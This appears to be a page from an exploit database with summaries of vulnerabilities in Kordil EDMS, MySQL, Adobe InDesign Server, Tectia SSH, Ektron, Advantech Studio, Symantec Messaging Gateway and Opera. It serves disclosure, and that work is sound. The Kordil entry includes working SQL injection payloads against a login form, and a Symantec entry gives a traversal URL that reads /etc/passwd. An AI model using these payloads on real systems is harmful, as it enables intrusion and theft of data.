Explore Vulnerabilities

Explore all Exploits:

Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability

Ingress Security has found multiple SQL injection vulnerabilities in the Kordil EDMS software.

Proof of Concept:

URL: http://localhost/kordil/global_group_login.php
Type: Error-based
Payload: User=admin&Password=12345' AND EXTRACTVALUE(1299,CONCAT(0x5c,0x3a6a6f793a,(SELECT (CASE WHEN (1299=1299) THEN 1 ELSE 0 END)),0x3a6a77683a)) AND 'hax'='hax&act=n&QS_Submit=Submit

URL: http://localhost/kordil/global_group_login.php
Type: Blind - Time-based
Payload: User=admin&Password=12345' AND SLEEP(5) AND 'hax'='hax&act=n&QS_Submit=Submit

Oracle MySQL for Microsoft Windows MOF Execution

This module takes advantage of a file privilege misconfiguration problem specifically against Windows MySQL servers (due to the use of a .mof file). This may result in arbitrary code execution under the context of SYSTEM. Note that in order to use this module, you must have a valid MySQL account on the target machine.

Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution

This module abuses the 'RunScript' procedure provided by the SOAP interface of Adobe InDesign Server to execute arbitrary VBScript (Windows) or AppleScript (OSX). The exploit drops the payload on the server, and the payload must be removed manually.

NVIDIA Install Application 2.1002.85.551 (NVI2.dll) Unicode Buffer Overflow PoC

NVIDIA Install Application 2.1002.85.551 (NVI2.dll) contains a buffer overflow vulnerability in the 'AddPackages' function of NVI2.dll when handling the value assigned to the 'pDirectory' string variable. An attacker can exploit this vulnerability by inserting an overly long array of data which may lead to execution of arbitrary code.

Tectia SSH USERAUTH Change Request Password Reset Vulnerability

This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by an SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request sent before password authentication, allowing any remote user to bypass the login routine and then gain access as root.

Ektron 8.02 XSLT Transform Remote Code Execution

This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The vulnerability exists due to the insecure usage of XslCompiledTransform with an XSLT controlled by the user. The module has been tested successfully on Ektron CMS 8.02 over Windows 2003 SP2, where it allows execution of arbitrary code with NETWORK SERVICE privileges.

Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day

Advantech Studio v7.0 SCADA/HMI has a built-in web server, NTWebServer.exe. The web server is a standalone executable that is used alongside every project to serve as a web-based management system with the help of an ActiveX control. The flaw occurs because of a lack of any check on the path of the file requested. This allows an attacker to read any file on the system, including the project files and the web server configuration file.

Symantec Messaging Gateway – Arbitrary file download is possible with a crafted URL (authenticated)

The vulnerability would enable an attacker (who has authenticated to the web interface) to download arbitrary files from the appliance with the permissions of the Webserver user. Various files containing sensitive information can be downloaded using a crafted URL, for example: http://192.168.1.59:41080/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1

Symantec Messaging Gateway – Easy CSRF to add a backdoor-administrator (for example)

It would be relatively easy for an attacker to add a backdoor-administrator to the system by getting a logged-in administrator to view a webpage with a specially crafted image tag. This is partly due to the fact that GET and POST requests are interchangeable, there is no password protection on sensitive functions, and there is no CSRF protection in the product.

Opera Web Browser 12.11 WriteAV Vulnerability

Opera is a web browser and Internet suite developed by Opera Software with over 270 million users worldwide. The browser handles common Internet-related tasks such as displaying web sites, sending and receiving e-mail messages, managing contacts, chatting on IRC, downloading files via BitTorrent, and reading web feeds. Opera is offered free of charge for personal computers and mobile phones. The vulnerability is a context-dependent heap corruption during the handling of GIF files. Successful exploits can allow attackers to execute arbitrary code.

Recent Exploits: